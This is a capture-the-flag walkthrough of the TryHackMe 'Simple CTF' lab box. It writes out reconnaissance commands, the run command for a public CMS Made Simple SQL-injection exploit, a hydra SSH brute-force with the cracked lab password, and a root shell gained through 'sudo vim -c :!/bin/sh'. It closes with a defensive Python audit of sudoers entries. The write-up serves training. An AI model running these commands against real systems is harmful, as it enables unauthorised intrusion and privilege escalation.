Simple CTF Walkthrough - TryHackMe

Hello everyone, welcome to another CTF walkthrough. I hope everyone is doing well.
Let's begin the walkthrough.
Visit the tryhackme.com website and connect to the Simple CTF challenge.
Target IP : 10.10.57.170
Note: Midway through, I got disconnected because of a network issue, and a new IP (10.10.120.76) was assigned to the target when I reconnected.

First, ping the target machine to check that the two machines can communicate.
Command : ping 10.10.57.170
Next, scan the target machine using Nmap.


- Port 21/tcp → open
- Port 80/http → open
- Port 2222/ssh → open
Since port 80 is open, we will open the target address in the browser to check its behavior.
URL : http://10.10.57.170

As we can see, the Apache server is up.
Next we will perform directory scanning using gobuster. This will list the directories it can find from the wordlist.
Command : gobuster dir -u http://10.10.57.170 -t 100 -e -w /usr/share/wordlists/dirb/common.txt

From the scan we found two interesting directories/files:
- /robots.txt
- /simple
Opening /robots.txt revealed that there is a user called mike.
URL : http://10.10.57.170/robots.txt

Now we will try /simple.
URL : http://10.10.57.170/simple

This took us to the CMS website.
By navigating the website we found the CMS version, 2.2.8.
With the version known, we googled for any exploits.

We found the "CMS Made Simple < 2.2.10 - SQL Injection" exploit.

We downloaded the exploit to our Kali machine and checked its contents using the nano editor.

Now we will use the above exploit.
Command : python 46635.py -u http://10.10.57.170 --crack -w /usr/share/wordlists/rockyou.txt

The exploit was giving errors for the requests module and the termcolor module.
ImportError: No module name request.
After researching this error and trying out many things, I got to know that the exploit is written for python2 but my Kali is using python3.
So we should change the priority so that python2 comes first.
The website below helps with these commands.
https://linuxconfig.org/ubuntu-20-04-python-version-switch-manager
After resolving the error and running the exploit, we got to know about the user called mitch.

Password cracking was taking a lot of time with the exploit, so I decided to use the hydra tool for password cracking.
Command : hydra -l mitch -P /usr/share/wordlists/rockyou.txt <target ip> -s 2222 ssh

We got the credentials of mitch.
username : mitch
password : secret
Now we will try to connect as mitch over SSH on port 2222.
Command : ssh mitch@<targetip> -p 2222

We are now connected as mitch.
Command : id
As we can see, mitch is a normal user.

Navigating the directories, we found the user.txt flag.

Further exploring revealed that there was another user called sunbath.
Now we should escalate our privileges, so we will use the command below.
Command : sudo -l

As we can see, /usr/bin/vim can be executed with root privileges with no password.
So, on the GTFOBins website we found the technique for getting sudo privileges with vim.

The exploit command/script is : sudo vim -c ':!/bin/sh'

We got in as root.
Navigating further, we got root.txt and the root flag.
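
From the defender's side, the weakness used above is a sudoers entry that lets a normal user run an editor as root. The following is an added example (not part of the original walkthrough) that audits `sudo -l` output for such entries; the sample output, the hostname `examplehost` and the short binary lists are constructed assumptions.

```python
import os
import re

# Constructed `sudo -l` output; only the vim entry mirrors the walkthrough.
SAMPLE = """\
Matching Defaults entries for mitch on examplehost:
    env_reset, mail_badpass

User mitch may run the following commands on examplehost:
    (root) NOPASSWD: /usr/bin/vim
    (root) NOEXEC: /usr/bin/less /var/log/syslog
    (root) /usr/bin/whoami
"""

# Small illustrative samples, not exhaustive; GTFOBins catalogues many more.
EDITORS = {"vim", "vi", "nano", "ed", "emacs"}
SHELL_ESCAPE = EDITORS | {"less", "more", "man", "find", "awk"}

# "(runas) TAG: TAG: cmd, cmd" as printed by `sudo -l` (tags assumed at line start).
ENTRY = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>\S.*)$")

def audit_sudo_l(output):
    """Return one finding per command that gives the caller a root shell or root file write."""
    findings = []
    for line in output.splitlines():
        m = ENTRY.match(line)
        if not m:
            continue  # Defaults, headers and blank lines
        tags = set(re.findall(r"[A-Z_]+", m.group("tags")))
        users = m.group("runas").split(":")[0]
        if not any(u.strip() in ("root", "ALL") for u in users.split(",")):
            continue  # entry does not run as root
        for cmd in filter(None, (c.strip() for c in m.group("cmds").split(","))):
            binary = os.path.basename(cmd.split()[0])
            reasons = []
            if cmd == "ALL":
                reasons.append("any command allowed")
            if binary in SHELL_ESCAPE and "NOEXEC" not in tags:
                reasons.append("can spawn a shell (no NOEXEC tag)")
            if binary in EDITORS:
                # NOEXEC does not stop an editor from writing files as root.
                reasons.append("editor runs as root; grant sudoedit on specific files instead")
            if reasons:
                findings.append({"command": cmd, "nopasswd": "NOPASSWD" in tags, "reasons": reasons})
    return findings

if __name__ == "__main__":
    for finding in audit_sudo_l(SAMPLE):
        print(finding)
```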


YES!!! we completed the task.
Thank you and have a great day.